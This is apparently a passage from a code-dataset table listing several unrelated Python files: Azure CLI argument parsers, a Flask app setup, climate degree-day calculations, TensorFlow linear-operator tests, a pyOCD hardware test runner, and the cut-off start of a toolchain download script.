ext (stringclasses, 9 values) | sha (stringlengths, 40) | content (stringlengths, 3 to 1.04M)
---|---|---
py | 1a40a0289a7c3c48b6e6b0ff777374f6a624e925 | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=protected-access
import argparse
from collections import defaultdict
from knack.util import CLIError
class AddAutoScale(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.auto_scale = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'min-node-count':
d['min_node_count'] = v[0]
elif kl == 'enabled':
d['enabled'] = v[0]
elif kl == 'max-node-count':
d['max_node_count'] = v[0]
return d
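# Illustrative note (not generated code): given hypothetical CLI input such as
#   --auto-scale enabled=true min-node-count=3 max-node-count=10
# get_action() returns {'enabled': 'true', 'min_node_count': '3', 'max_node_count': '10'};
# values stay strings, and the same KEY=VALUE parsing pattern repeats in the actions below.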
class AddAutoPause(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.auto_pause = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'delay-in-minutes':
d['delay_in_minutes'] = v[0]
elif kl == 'enabled':
d['enabled'] = v[0]
return d
class AddLibraryRequirements(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.library_requirements = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'content':
d['content'] = v[0]
elif kl == 'filename':
d['filename'] = v[0]
return d
class AddSku(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.sku = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'tier':
d['tier'] = v[0]
elif kl == 'name':
d['name'] = v[0]
return d
class AddRecurringScans(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.recurring_scans = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
d['email_subscription_admins'] = True
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'is-enabled':
d['is_enabled'] = v[0]
elif kl == 'email-subscription-admins':
d['email_subscription_admins'] = v[0]
elif kl == 'emails':
d['emails'] = v
return d
class AddBaselineResults(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddBaselineResults, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'result':
d['result'] = v
return d
class AddDefaultDataLakeStorage(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.default_data_lake_storage = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'account-url':
d['account_url'] = v[0]
elif kl == 'filesystem':
d['filesystem'] = v[0]
return d
class AddConnectivityEndpoints(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
namespace.connectivity_endpoints = action
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
v = properties[k]
d[k] = v[0]
return d
class AddPrivateEndpointConnections(argparse._AppendAction):
def __call__(self, parser, namespace, values, option_string=None):
action = self.get_action(values, option_string)
super(AddPrivateEndpointConnections, self).__call__(parser, namespace, action, option_string)
def get_action(self, values, option_string): # pylint: disable=no-self-use
try:
properties = defaultdict(list)
for (k, v) in (x.split('=', 1) for x in values):
properties[k].append(v)
properties = dict(properties)
except ValueError:
raise CLIError('usage error: {} [KEY=VALUE ...]'.format(option_string))
d = {}
for k in properties:
kl = k.lower()
v = properties[k]
if kl == 'status':
d['status'] = v[0]
elif kl == 'description':
d['description'] = v[0]
return d
|
py | 1a40a10d6ffb4a4fc95b0bf18532e3accf272430 | # app/__init__.py
import os
from flask import Flask, render_template
from flask_sqlalchemy import SQLAlchemy
from flask_bcrypt import Bcrypt
from flask_login import LoginManager
from flask_bootstrap import Bootstrap
db = SQLAlchemy()
bootstrap = Bootstrap()
login_manager = LoginManager()
login_manager.login_view = 'authentication.do_the_login'
login_manager.session_protection = 'strong'
bcrypt = Bcrypt()
def page_not_found(e):
return render_template('error404.html'), 404
def create_app(config_type):  # dev, test or prod
app = Flask(__name__)
configuration = os.path.join(os.getcwd(),'config', config_type + '.py')
app.config.from_pyfile(configuration)
app.register_error_handler(404, page_not_found)
db.init_app(app)
bootstrap.init_app(app)
login_manager.init_app(app)
bcrypt.init_app(app)
    from app.cadastros import main  # path to app/cadastros
app.register_blueprint(main)
from app.auth import authentication
app.register_blueprint(authentication)
from app.tc import termos
app.register_blueprint(termos)
from app.busca import buscar
app.register_blueprint(buscar)
return app
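# Usage sketch (added for illustration; assumes a matching config/dev.py exists):
#   app = create_app('dev')
#   app.run(debug=True)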
|
py | 1a40a216f40fc7c4ca119e6f3b7abacf9c4ae475 | import xarray as xr
import numpy as np
from climate_toolbox.utils.utils import \
remove_leap_days, convert_kelvin_to_celsius
def snyder_edd(tasmin, tasmax, threshold):
r"""
Snyder exceedance degree days/cooling degree days
Similarly to Snyder HDDs, Snyder exceedance degree days for any given day
    are given by the integral between the sinusoid-interpolated temperature and
the threshold.
The closed form solution is given by:
.. math::
EDD_{P} = \sum_{d \in P} EDD_d
where
.. math::
        EDD_d =
\begin{cases}
( (M - e)(\pi /2 - \theta) + w \cos(\theta) ) / \pi, & \text{if } tmin_d < e < tmax_d \\
0 , & \text{if } tmax_d < e \\
M - e, & \text{otherwise}
\end{cases}
and
.. math::
\begin{array}{rll}
M & = & (tmax_d + tmin_d)/2 \\
w & = & (tmax_d-tmin_d)/2 \\
\theta & = & \arcsin( (e-M)/w ) \\
\end{array}
Parameters
----------
tasmin : xarray.DataArray
Daily minimum temperature (degrees C)
tasmax : xarray.DataArray
Daily maximum temperature (degrees C)
threshold : int, float, xarray.DataArray
Threshold (degrees C)
Returns
-------
edd : xarray.DataArray
Snyder exceedance degree days (degreedays)
"""
# Check for unit agreement
assert tasmin.units == tasmax.units
# check to make sure tasmax > tasmin everywhere
assert not (tasmax < tasmin).any(), "values encountered where tasmin > tasmax"
# compute useful quantities for use in the transformation
snyder_mean = ((tasmax + tasmin)/2)
snyder_width = ((tasmax - tasmin)/2)
snyder_theta = xr.ufuncs.arcsin((threshold - snyder_mean)/snyder_width)
    # the transformation is computed using numpy arrays, taking advantage of
# numpy's second where clause. Note that in the current dev build of
# xarray, xr.where allows this functionality. As soon as this goes live,
# this block can be replaced with xarray
res = xr.where(
tasmin < threshold,
xr.where(
tasmax > threshold,
((snyder_mean - threshold) * (np.pi/2 - snyder_theta)
+ (snyder_width * np.cos(snyder_theta))) / np.pi,
0),
snyder_mean - threshold)
res.attrs['units'] = (
'degreedays_{}{}'.format(threshold, tasmax.attrs['units']))
return res
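# Illustrative sketch (not part of the original module; the toy values are hypothetical):
#   tasmin = xr.DataArray([10., 15.], dims=['time'], attrs={'units': 'C'})
#   tasmax = xr.DataArray([20., 28.], dims=['time'], attrs={'units': 'C'})
#   edd = snyder_edd(tasmin, tasmax, threshold=20.)
# Day 1 contributes 0 degree days (tasmax does not exceed the threshold); day 2
# integrates the sinusoid above 20 C, and edd.attrs['units'] becomes 'degreedays_20.0C'.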
def snyder_gdd(tasmin, tasmax, threshold_low, threshold_high):
r"""
Snyder growing degree days
Growing degree days are the difference between EDD measures at two
thresholds.
.. math::
{GDD}_{T_{low}, T_{high}, y, i} = {EDD}_{T_{low}, y, i} - {EDD}_{T_{high}, y, i}
Note that where :math:`tas_{d,i}>{T_{high}}`, GDD will be a constant value
:math:`T_{high}-T_{low}`. Thus, this measure is only useful when another
measure, e.g. :math:`{EDD}_{T_{high}}`, sometimes referred to as
*killing degree days*, is used as an additional predictor.
Parameters
----------
tasmin : xarray.DataArray
Daily minimum temperature (degrees C)
tasmax : xarray.DataArray
Daily maximum temperature (degrees C)
threshold_low : int, float, xarray.DataArray
Lower threshold (degrees C)
threshold_high : int, float, xarray.DataArray
Upper threshold (degrees C)
Returns
-------
gdd : xarray.DataArray
Snyder growing degree days (degreedays)
"""
# Check for unit agreement
assert tasmin.units == tasmax.units
res = (
snyder_edd(tasmin, tasmax, threshold_low)
- snyder_edd(tasmin, tasmax, threshold_high))
res.attrs['units'] = (
'degreedays_{}-{}{}'.format(threshold_low, threshold_high, tasmax.attrs['units']))
return res
def validate_edd_snyder_agriculture(ds, thresholds):
msg_null = 'hierid dims do not match 24378'
assert ds.hierid.shape == (24378,), msg_null
for threshold in thresholds:
assert threshold in list(ds.refTemp)
return
def tas_poly(ds, power, varname):
"""
Daily average temperature (degrees C), raised to a power
Leap years are removed before counting days (uses a 365 day
calendar).
"""
powername = ordinal(power)
description = ('''
Daily average temperature (degrees C){raised}
Leap years are removed before counting days (uses a 365 day
calendar).
'''.format(
raised='' if power == 1 else (
' raised to the {powername} power'
.format(powername=powername)))).strip()
ds1 = xr.Dataset()
# remove leap years
ds = remove_leap_days(ds)
# do transformation
ds1[varname] = (ds.tas - 273.15)**power
# Replace datetime64[ns] 'time' with YYYYDDD int 'day'
if ds.dims['time'] > 365:
raise ValueError
ds1.coords['day'] = ds['time.year']*1000 + np.arange(1, len(ds.time)+1)
ds1 = ds1.swap_dims({'time': 'day'})
ds1 = ds1.drop('time')
ds1 = ds1.rename({'day': 'time'})
# document variable
ds1[varname].attrs['units'] = (
'C^{}'.format(power) if power > 1 else 'C')
ds1[varname].attrs['long_title'] = description.splitlines()[0]
ds1[varname].attrs['description'] = description
ds1[varname].attrs['variable'] = varname
return ds1
def ordinal(n):
""" Converts numbers into ordinal strings """
return (
"%d%s" %
(n, "tsnrhtdd"[(n // 10 % 10 != 1) * (n % 10 < 4) * n % 10::4]))
|
py | 1a40a29ec6a040ca3d98e0b27492b1379d30cb4b | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_test_util
from tensorflow.python.platform import test
linalg = linalg_lib
random_seed.set_random_seed(23)
class SquareLinearOperatorFullMatrixTest(
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest."""
def _operator_and_matrix(self, build_info, dtype, use_placeholder):
shape = list(build_info.shape)
matrix = linear_operator_test_util.random_positive_definite_matrix(
shape, dtype)
lin_op_matrix = matrix
if use_placeholder:
lin_op_matrix = array_ops.placeholder_with_default(matrix, shape=None)
operator = linalg.LinearOperatorFullMatrix(lin_op_matrix, is_square=True)
return operator, matrix
def test_is_x_flags(self):
# Matrix with two positive eigenvalues.
matrix = [[1., 0.], [1., 11.]]
operator = linalg.LinearOperatorFullMatrix(
matrix,
is_positive_definite=True,
is_non_singular=True,
is_self_adjoint=False)
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_non_singular)
self.assertFalse(operator.is_self_adjoint)
# Auto-detected.
self.assertTrue(operator.is_square)
def test_assert_non_singular_raises_if_cond_too_big_but_finite(self):
with self.test_session():
tril = linear_operator_test_util.random_tril_matrix(
shape=(50, 50), dtype=np.float32)
diag = np.logspace(-2, 2, 50).astype(np.float32)
tril = array_ops.matrix_set_diag(tril, diag)
matrix = math_ops.matmul(tril, tril, transpose_b=True).eval()
operator = linalg.LinearOperatorFullMatrix(matrix)
with self.assertRaisesOpError("Singular matrix"):
# Ensure that we have finite condition number...just HUGE.
cond = np.linalg.cond(matrix)
self.assertTrue(np.isfinite(cond))
self.assertGreater(cond, 1e12)
operator.assert_non_singular().run()
def test_assert_non_singular_raises_if_cond_infinite(self):
with self.test_session():
matrix = [[1., 1.], [1., 1.]]
# We don't pass the is_self_adjoint hint here, which means we take the
# generic code path.
operator = linalg.LinearOperatorFullMatrix(matrix)
with self.assertRaisesOpError("Singular matrix"):
operator.assert_non_singular().run()
def test_assert_self_adjoint(self):
matrix = [[0., 1.], [0., 1.]]
operator = linalg.LinearOperatorFullMatrix(matrix)
with self.test_session():
with self.assertRaisesOpError("not equal to its adjoint"):
operator.assert_self_adjoint().run()
def test_assert_positive_definite(self):
matrix = [[1., 1.], [1., 1.]]
operator = linalg.LinearOperatorFullMatrix(matrix, is_self_adjoint=True)
with self.test_session():
with self.assertRaisesOpError("Cholesky decomposition was not success"):
operator.assert_positive_definite().run()
class SquareLinearOperatorFullMatrixSymmetricPositiveDefiniteTest(
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest.
In this test, the operator is constructed with hints that invoke the use of
a Cholesky decomposition for solves/determinant.
"""
def setUp(self):
# Increase from 1e-6 to 1e-5. This reduction in tolerance happens,
# presumably, because we are taking a different code path in the operator
        # and the matrix. The operator uses a Cholesky, the matrix uses standard
# solve.
self._atol[dtypes.float32] = 1e-5
self._rtol[dtypes.float32] = 1e-5
self._atol[dtypes.float64] = 1e-10
self._rtol[dtypes.float64] = 1e-10
@property
def _dtypes_to_test(self):
return [dtypes.float32, dtypes.float64]
def _operator_and_matrix(self, build_info, dtype, use_placeholder):
shape = list(build_info.shape)
matrix = linear_operator_test_util.random_positive_definite_matrix(
shape, dtype, force_well_conditioned=True)
lin_op_matrix = matrix
if use_placeholder:
lin_op_matrix = array_ops.placeholder_with_default(matrix, shape=None)
operator = linalg.LinearOperatorFullMatrix(lin_op_matrix, is_square=True)
return operator, matrix
def test_is_x_flags(self):
# Matrix with two positive eigenvalues.
matrix = [[1., 0.], [0., 7.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_positive_definite=True, is_self_adjoint=True)
self.assertTrue(operator.is_positive_definite)
self.assertTrue(operator.is_self_adjoint)
# Should be auto-set
self.assertTrue(operator.is_non_singular)
self.assertTrue(operator._can_use_cholesky)
self.assertTrue(operator.is_square)
def test_assert_non_singular(self):
matrix = [[1., 1.], [1., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_self_adjoint=True, is_positive_definite=True)
with self.test_session():
# Cholesky decomposition may fail, so the error is not specific to
# non-singular.
with self.assertRaisesOpError(""):
operator.assert_non_singular().run()
def test_assert_self_adjoint(self):
matrix = [[0., 1.], [0., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_self_adjoint=True, is_positive_definite=True)
with self.test_session():
with self.assertRaisesOpError("not equal to its adjoint"):
operator.assert_self_adjoint().run()
def test_assert_positive_definite(self):
matrix = [[1., 1.], [1., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix, is_self_adjoint=True, is_positive_definite=True)
with self.test_session():
# Cholesky decomposition may fail, so the error is not specific to
# non-singular.
with self.assertRaisesOpError(""):
operator.assert_positive_definite().run()
class NonSquareLinearOperatorFullMatrixTest(
linear_operator_test_util.NonSquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest."""
def _operator_and_matrix(self, build_info, dtype, use_placeholder):
shape = list(build_info.shape)
matrix = linear_operator_test_util.random_normal(shape, dtype=dtype)
lin_op_matrix = matrix
if use_placeholder:
lin_op_matrix = array_ops.placeholder_with_default(matrix, shape=None)
operator = linalg.LinearOperatorFullMatrix(lin_op_matrix, is_square=True)
return operator, matrix
def test_is_x_flags(self):
matrix = [[3., 2., 1.], [1., 1., 1.]]
operator = linalg.LinearOperatorFullMatrix(
matrix,
is_self_adjoint=False)
self.assertEqual(operator.is_positive_definite, None)
self.assertEqual(operator.is_non_singular, None)
self.assertFalse(operator.is_self_adjoint)
self.assertFalse(operator.is_square)
def test_matrix_must_have_at_least_two_dims_or_raises(self):
with self.assertRaisesRegexp(ValueError, "at least 2 dimensions"):
linalg.LinearOperatorFullMatrix([1.])
if __name__ == "__main__":
test.main()
|
py | 1a40a2d5db5db701ef5a7a7cbfda34b09d1751a0 | #!/usr/bin/env python
# pyOCD debugger
# Copyright (c) 2015-2020 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import sys
import logging
from time import time
import argparse
from xml.etree import ElementTree
import multiprocessing as mp
import io
from pyocd.core.session import Session
from pyocd.core.helpers import ConnectHelper
from pyocd.utility.conversion import float32_to_u32
from pyocd.probe.aggregator import DebugProbeAggregator
from test_util import (
get_env_file_name,
TestResult,
Test,
IOTee,
RecordingLogHandler,
get_session_options,
ensure_output_dir,
TEST_OUTPUT_DIR,
)
from basic_test import BasicTest
from speed_test import SpeedTest
from cortex_test import CortexTest
from flash_test import FlashTest
from flash_loader_test import FlashLoaderTest
from gdb_test import GdbTest
from json_lists_test import JsonListsTest
from connect_test import ConnectTest
from debug_context_test import DebugContextTest
from concurrency_test import ConcurrencyTest
from commands_test import CommandsTest
XML_RESULTS_TEMPLATE = "test_results{}.xml"
LOG_FILE_TEMPLATE = "automated_test_result{}.txt"
SUMMARY_FILE_TEMPLATE = "automated_test_summary{}.txt"
LOG_FORMAT = "%(relativeCreated)07d:%(levelname)s:%(module)s:%(message)s"
JOB_TIMEOUT = 30 * 60 # 30 minutes
# Put together list of all tests.
all_tests = [
BasicTest(),
JsonListsTest(),
ConnectTest(),
SpeedTest(),
CortexTest(),
ConcurrencyTest(),
FlashTest(),
FlashLoaderTest(),
DebugContextTest(),
GdbTest(),
CommandsTest(),
]
# Actual list used at runtime, filtered by command line args.
test_list = []
def print_summary(test_list, result_list, test_time, output_file=None):
for test in test_list:
test.print_perf_info(result_list, output_file=output_file)
Test.print_results(result_list, output_file=output_file)
print("", file=output_file)
print("Test Time: %.3f" % test_time, file=output_file)
if Test.all_tests_pass(result_list):
print("All tests passed", file=output_file)
else:
print("One or more tests has failed!", file=output_file)
def split_results_by_board(result_list):
boards = {}
for result in result_list:
if result.board_name in boards:
boards[result.board_name].append(result)
else:
boards[result.board_name] = [result]
return boards
def generate_xml_results(result_list):
board_results = split_results_by_board(result_list)
suite_id = 0
total_failures = 0
total_tests = 0
total_time = 0
root = ElementTree.Element('testsuites',
name="pyocd"
)
root.text = "\n"
for board_name, results in board_results.items():
total = 0
failures = 0
suite_time = 0
suite = ElementTree.SubElement(root, 'testsuite',
name=board_name,
id=str(suite_id))
suite.text = "\n"
suite.tail = "\n"
suite_id += 1
for result in results:
total += 1
if not result.passed:
failures += 1
case = result.get_test_case()
suite.append(case)
suite_time += result.time
suite.set('tests', str(total))
suite.set('failures', str(failures))
suite.set('time', "%.3f" % suite_time)
total_tests += total
total_failures += failures
total_time += suite_time
root.set('tests', str(total_tests))
root.set('failures', str(total_failures))
root.set('time', "%.3f" % total_time)
xml_results = os.path.join(TEST_OUTPUT_DIR, XML_RESULTS_TEMPLATE.format(get_env_file_name()))
ElementTree.ElementTree(root).write(xml_results, encoding="UTF-8", xml_declaration=True)
def print_board_header(outputFile, board, n, includeDividers=True, includeLeadingNewline=False):
header = "TESTING BOARD {name} [{target}] [{uid}] #{n}".format(
name=board.name, target=board.target_type, uid=board.unique_id, n=n)
if includeDividers:
divider = "=" * len(header)
if includeLeadingNewline:
print("\n" + divider, file=outputFile)
else:
print(divider, file=outputFile)
print(header, file=outputFile)
if includeDividers:
print(divider + "\n", file=outputFile)
def test_board(board_id, n, loglevel, logToConsole, commonLogFile):
"""! @brief Run all tests on a given board.
When multiple test jobs are being used, this function is the entry point executed in
child processes.
Always writes both stdout and log messages of tests to a board-specific log file, and saves
the output for each test to a string that is stored in the TestResult object. Depending on
the logToConsole and commonLogFile parameters, output may also be copied to the console
(sys.stdout) and/or a common log file for all boards.
@param board_id Unique ID of the board to test.
@param n Unique index of the test run.
@param loglevel Log level passed to logger instance. Usually INFO or DEBUG.
@param logToConsole Boolean indicating whether output should be copied to sys.stdout.
@param commonLogFile If not None, an open file object to which output should be copied.
"""
probe = DebugProbeAggregator.get_probe_with_id(board_id)
assert probe is not None
session = Session(probe, **get_session_options())
board = session.board
originalStdout = sys.stdout
originalStderr = sys.stderr
# Set up board-specific output file. A previously existing file is removed.
env_name = (("_" + os.environ['TOX_ENV_NAME']) if ('TOX_ENV_NAME' in os.environ) else '')
name_info = "{}_{}_{}".format(env_name, board.name, n)
log_filename = os.path.join(TEST_OUTPUT_DIR, LOG_FILE_TEMPLATE.format(name_info))
if os.path.exists(log_filename):
os.remove(log_filename)
# Skip board if specified in the config.
if session.options['skip_test']:
print("Skipping board %s due as specified in config" % board.unique_id)
return []
# Skip this board if we don't have a test binary.
if board.test_binary is None:
print("Skipping board %s due to missing test binary" % board.unique_id)
return []
# Open board-specific output file. This is done after skipping so a skipped board doesn't have a
# log file created for it (but a previous log file will be removed, above).
log_file = open(log_filename, "w", buffering=1) # 1=Line buffered
# Setup logging.
log_handler = RecordingLogHandler(None)
log_handler.setFormatter(logging.Formatter(LOG_FORMAT))
root_logger = logging.getLogger()
root_logger.setLevel(loglevel)
root_logger.addHandler(log_handler)
result_list = []
try:
# Write board header to board log file, common log file, and console.
print_board_header(log_file, board, n)
if commonLogFile:
print_board_header(commonLogFile, board, n, includeLeadingNewline=(n != 0))
print_board_header(originalStdout, board, n, logToConsole, includeLeadingNewline=(n != 0))
# Run all tests on this board.
for test in test_list:
print("{} #{}: starting {}...".format(board.name, n, test.name), file=originalStdout)
# Set a unique port for the GdbTest.
if isinstance(test, GdbTest):
test.n = n
# Create a StringIO object to record the test's output, an IOTee to copy
# output to both the log file and StringIO, then set the log handler and
# stdio to write to the tee.
testOutput = io.StringIO()
tee = IOTee(log_file, testOutput)
if logToConsole:
tee.add(originalStdout)
if commonLogFile is not None:
tee.add(commonLogFile)
log_handler.stream = tee
sys.stdout = tee
sys.stderr = tee
test_start = time()
result = test.run(board)
test_stop = time()
result.time = test_stop - test_start
tee.flush()
result.output = testOutput.getvalue()
result_list.append(result)
passFail = "PASSED" if result.passed else "FAILED"
print("{} #{}: finished {}... {} ({:.3f} s)".format(
board.name, n, test.name, passFail, result.time),
file=originalStdout)
finally:
# Restore stdout/stderr in case we're running in the parent process (1 job).
sys.stdout = originalStdout
sys.stderr = originalStderr
root_logger.removeHandler(log_handler)
log_handler.flush()
log_handler.close()
return result_list
def filter_tests(args):
"""! @brief Generate the list of tests to run based on arguments."""
if args.exclude_tests and args.include_tests:
print("Please only include or exclude tests, not both simultaneously.")
sys.exit(1)
excludes = [t.strip().lower() for t in args.exclude_tests.split(',')] if args.exclude_tests else []
includes = [t.strip().lower() for t in args.include_tests.split(',')] if args.include_tests else []
for test in all_tests:
if excludes:
include_it = (test.name.lower() not in excludes)
elif includes:
include_it = (test.name.lower() in includes)
else:
include_it = True
if include_it:
test_list.append(test)
def main():
parser = argparse.ArgumentParser(description='pyOCD automated testing')
parser.add_argument('-d', '--debug', action="store_true", help='Enable debug logging')
parser.add_argument('-q', '--quiet', action="store_true", help='Hide test progress for 1 job')
parser.add_argument('-j', '--jobs', action="store", default=1, type=int, metavar="JOBS",
help='Set number of concurrent board tests (default is 1)')
parser.add_argument('-b', '--board', action="append", metavar="ID", help="Limit testing to boards with specified unique IDs. Multiple boards can be listed.")
parser.add_argument('-l', '--list-tests', action="store_true", help="Print a list of tests that will be run.")
parser.add_argument('-x', '--exclude-tests', metavar="TESTS", default="", help="Comma-separated list of tests to exclude.")
parser.add_argument('-i', '--include-tests', metavar="TESTS", default="", help="Comma-separated list of tests to include.")
args = parser.parse_args()
# Allow CI to override the number of concurrent jobs.
if 'CI_JOBS' in os.environ:
args.jobs = int(os.environ['CI_JOBS'])
filter_tests(args)
if args.list_tests:
for test in test_list:
print(test.name)
return
# Disable multiple jobs on macOS prior to Python 3.4. By default, multiprocessing uses
# fork() on Unix, which doesn't work on the Mac because CoreFoundation requires exec()
# to be used in order to init correctly (CoreFoundation is used in hidapi). Only on Python
# version 3.4+ is the multiprocessing.set_start_method() API available that lets us
# switch to the 'spawn' method, i.e. exec().
if args.jobs > 1 and sys.platform.startswith('darwin') and sys.version_info[0:2] < (3, 4):
print("WARNING: Cannot support multiple jobs on macOS prior to Python 3.4. Forcing 1 job.")
args.jobs = 1
ensure_output_dir()
# Setup logging based on concurrency and quiet option.
level = logging.DEBUG if args.debug else logging.INFO
if args.jobs == 1 and not args.quiet:
log_file = os.path.join(TEST_OUTPUT_DIR, LOG_FILE_TEMPLATE.format(get_env_file_name()))
# Create common log file.
if os.path.exists(log_file):
os.remove(log_file)
logToConsole = True
commonLogFile = open(log_file, "a")
else:
logToConsole = False
commonLogFile = None
board_list = []
result_list = []
# Put together list of boards to test
board_list = ConnectHelper.get_all_connected_probes(blocking=False)
board_id_list = sorted(b.unique_id for b in board_list)
# Filter boards.
if args.board:
board_id_list = [b for b in board_id_list if any(c for c in args.board if c.lower() in b.lower())]
# If only 1 job was requested, don't bother spawning processes.
start = time()
if args.jobs == 1:
for n, board_id in enumerate(board_id_list):
result_list += test_board(board_id, n, level, logToConsole, commonLogFile)
else:
# Create a pool of processes to run tests.
        pool = mp.Pool(args.jobs)
        try:
# Issue board test job to process pool.
async_results = [pool.apply_async(test_board, (board_id, n, level, logToConsole, commonLogFile))
for n, board_id in enumerate(board_id_list)]
# Gather results.
for r in async_results:
result_list += r.get(timeout=JOB_TIMEOUT)
finally:
pool.close()
pool.join()
stop = time()
test_time = (stop - start)
print_summary(test_list, result_list, test_time)
summary_file = os.path.join(TEST_OUTPUT_DIR, SUMMARY_FILE_TEMPLATE.format(get_env_file_name()))
with open(summary_file, "w") as output_file:
print_summary(test_list, result_list, test_time, output_file)
generate_xml_results(result_list)
exit_val = 0 if Test.all_tests_pass(result_list) else -1
exit(exit_val)
#TODO - check if any threads are still running?
if __name__ == "__main__":
# set_start_method is only available in Python 3.4+.
if sys.version_info[0:2] >= (3, 4):
mp.set_start_method('spawn')
main()
|
py | 1a40a2dc3f9e69968e1c2fb484dc1a9fc534add5 | #!/usr/bin/env python3
import os, sys
import json
from pathlib import Path
import requests
from time import time
from tempfile import gettempdir
import tarfile
import concurrent
from concurrent.futures import ThreadPoolExecutor
import pkg_resources
## Just perform a sanity check on cache hits:
toolchains_file = Path("./toolchains.yaml")
toolchains = None
toolchains_dir = Path.home() / "toolchains"
if os.getenv("CACHED_SETUP_TOOLCHAINS") == 'true' :
sys.exit(0)
# Check if we are running in a development version
#
if toolchains_file.exists():
from ruamel.yaml import YAML
yaml = YAML(typ="safe")
toolchains = yaml.load(toolchains_file)
else:
toolchains_str = pkg_resources.resource_string(__name__, "toolchains.json")
toolchains = json.loads(toolchains_str)
def download_chunks(tc):
url = tc.get("url")
tarfile = f"{tc.get('release')}.tgz"
local_filename = Path(gettempdir()) / tarfile
print(url)
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(local_filename, "wb") as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
return local_filename
"""
This assumes the resulting tar file already has a top level directory for now.
"""
def extract_as_tar(tc, tar):
to_path = toolchains_dir
